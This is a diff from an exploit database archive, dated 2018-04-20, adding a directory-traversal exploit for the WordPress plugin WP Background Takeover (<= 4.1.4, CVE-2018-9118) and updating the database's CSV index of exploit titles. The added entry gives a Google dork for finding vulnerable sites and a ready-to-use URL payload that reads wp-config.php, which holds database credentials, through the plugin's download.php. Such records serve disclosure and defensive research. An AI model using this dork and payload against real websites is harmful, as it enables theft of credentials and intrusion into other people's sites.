DB: 2018-04-20

1 changes to exploits/shellcodes

Wordpress Background Takeover < 4.1.4 - Directory Traversal

exploits/php/webapps/44417.txt

@@ -0,0 +1,15 @@
+# Exploit Title: WP Background Takeover, Directory Traversal <= 4.1.4
+# Google Dork: inurl:/plugins/wpsite-background-takeover
+# Date: 2018-03-08
+# Exploit Author: Colette Chamberland, Defiant, Inc.
+# Vendor Homepage: https://99robots.com
+# Software Link: https://99robots.com/products/wp-background-takeover-advertisements/
+# Version: <= 4.1.4
+# Tested on: Wordpress 4.9.x
+# CVE : CVE-2018-9118
+
+Description
+
+Allows for an attacker to browse files via the download.php file:
+
+http://target[.]com/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php

files_exploits.csv

@@ -39151,6 +39151,7 @@ id,file,description,date,author,type,platform,port
 44413,exploits/hardware/webapps/44413.txt,"FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass",2018-04-06,"Noman Riffat",webapps,hardware,
 44414,exploits/windows/webapps/44414.txt,"DotNetNuke DNNarticle Module 11 - Directory Traversal",2018-04-06,"Esmaeil Rahimian",webapps,windows,
 44416,exploits/php/webapps/44416.txt,"Cobub Razor 0.7.2 - Cross-Site Request Forgery",2018-04-06,ppb,webapps,php,
+44417,exploits/php/webapps/44417.txt,"Wordpress Background Takeover < 4.1.4 - Directory Traversal",2018-04-09,"Colette Chamberland",webapps,php,
 44418,exploits/php/webapps/44418.txt,"WolfCMS 0.8.3.1 - Cross-Site Request Forgery",2018-04-09,"Sureshbabu Narvaneni",webapps,php,
 44419,exploits/php/webapps/44419.txt,"Cobub Razor 0.7.2 - Add New Superuser Account",2018-04-09,ppb,webapps,php,
 44420,exploits/php/webapps/44420.txt,"MyBB Plugin Recent Threads On Index - Cross-Site Scripting",2018-04-09,Perileos,webapps,php,